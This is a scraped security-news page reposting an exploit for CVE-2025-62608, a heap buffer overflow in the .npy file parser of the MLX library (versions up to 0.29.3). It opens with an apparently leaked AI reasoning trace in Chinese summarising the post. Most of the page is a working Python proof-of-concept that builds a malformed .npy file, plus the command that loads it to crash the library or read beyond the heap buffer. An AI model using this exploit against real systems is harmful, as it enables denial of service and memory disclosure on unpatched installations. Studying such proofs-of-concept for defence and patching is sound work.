嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内。首先,我需要仔细阅读文章内容,理解其主要信息。 这篇文章看起来是一个安全漏洞的报告。标题是MLX <= 0.29.3 - Heap-based Buffer Overflow in .npy Parser。作者是Mohammed Idrees Banyamer,来自约旦。漏洞的CVE编号是CVE-2025-62608,影响的是mlx库的版本<=0.29.3。 文章描述了一个堆缓冲区溢出的问题,具体是在解析NumPy的.npy文件时发生的。问题出现在mlx::core::load()函数中。当解析.npy文件时,由于早期的空字节截断std::string,并且固定偏移量访问header[34]导致了13字节的堆外读取,从而引发崩溃或有限的信息泄露。 漏洞的影响包括拒绝服务或本地攻击,CVSS评分为5.5(中等)。修复版本是mlx >= 0.29.4。文章还提供了一个PoC脚本,生成恶意的.npy文件来触发这个漏洞。 用户要求总结控制在100字以内,并且不需要特定的开头。因此,我需要提取关键信息:漏洞名称、影响版本、问题类型、触发条件、影响和修复版本。 现在,把这些信息浓缩成一句话:MLX <= 0.29.3存在一个基于堆的缓冲区溢出漏洞,在解析.npy文件时导致堆外读取,影响版本<=0.29.3,已修复于0.29.4。 这样既涵盖了漏洞的基本信息、影响范围和修复情况,又控制在了100字以内。 </think> MLX <= 0.29.3存在基于堆的缓冲区溢出漏洞,在解析.npy文件时导致堆外读取,影响版本<=0.29.3,已修复于0.29.4。 2026-2-26 18:38:43 Author: cxsecurity.com(查看原文) 阅读量:0 收藏
MLX <= 0.29.3 - Heap-based Buffer Overflow in .npy Parser
#!/usr/bin/env python3 """ Exploit Title: MLX <= 0.29.3 - Heap-based Buffer Overflow in .npy Parser CVE: CVE-2025-62608 Date: 2026-02-24 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamer_security Vendor Homepage: https://github.com/ml-explore/mlx Software Link: https://github.com/ml-explore/mlx Affected: mlx <= 0.29.3 (pip package) Tested on: Ubuntu 22.04 / Python 3.11 + mlx 0.29.3 Category: Denial of Service / Local Platform: Linux / macOS (Apple Silicon) Exploit Type: Proof of Concept CVSS: 5.5 (Medium) - AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H Description: Heap-buffer-overflow (CWE-122) in mlx::core::load() during NumPy .npy parsing. Early null byte truncates std::string; fixed offset access (header[34]) causes 13-byte out-of-bounds heap read → crash or limited info leak. Fixed in: mlx >= 0.29.4 Usage: python3 cve-2025-62608.py python3 -c "import mlx.core as mx; mx.load('exploit.npy')" Notes: Triggers segfault or ASan heap-buffer-overflow. Reference: https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6 """ BANNER = r""" ███╗ ███╗██╗ ██╗ ██╗ ██╗ ██╗███████╗ █████╗ ██████╗ ████╗ ████║██║ ╚██╗██╔╝ ██║ ██║██╔════╝██╔══██╗██╔══██╗ ██╔████╔██║██║ ╚███╔╝ ███████║█████╗ ███████║██████╔╝ ██║╚██╔╝██║██║ ██╔██╗ ╚════██║██╔══╝ ██╔══██║██╔══██╗ ██║ ╚═╝ ██║███████╗██╔╝ ██╗ ██║███████╗██║ ██║██║ ██║ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ CVE-2025-62608 • Heap Buffer Overflow • MLX .npy Exploit PoC by Mohammed Idrees Banyamer (@banyamer_security) =================================================== """ print(BANNER) import struct import os # ────────────────────────────────────────────────────────────────────────────── # Generate malicious .npy file (reproduces advisory condition exactly) # ────────────────────────────────────────────────────────────────────────────── magic = b'\x93NUMPY' version = b'\x01\x00' # NumPy v1.0 header_content = b"{'descr': '<u2', 'fo\x00\x00\x00\x00n_order': False, 'shape': (3,), }" # Exactly 118 bytes header + newline (v1 .npy format) padding = b' ' * (118 - len(header_content) - 1) header = header_content + padding + b'\n' payload = ( magic + version + struct.pack('<H', 118) + header + b'\x00\x00\x00\x80\xff\xff' # minimal dummy data ) filename = "exploit.npy" try: with open(filename, "wb") as f: f.write(payload) abs_path = os.path.abspath(filename) file_size = os.path.getsize(filename) print(f"[+] Malicious .npy file generated successfully!") print(f" Path : {abs_path}") print(f" Size : {file_size} bytes") print("\n[+] To trigger the heap overflow:") print(f" python3 -c \"import mlx.core as mx; mx.load('{filename}')\"") print("\nOn vulnerable mlx <= 0.29.3 you should see:") print(" → Segmentation fault") print(" or ASan report: heap-buffer-overflow (read ~13 bytes past buffer)") print("\nPatched in: mlx >= 0.29.4") print("Advisory: https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6") except Exception as e: print(f"[-] Failed to write file: {e}")
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh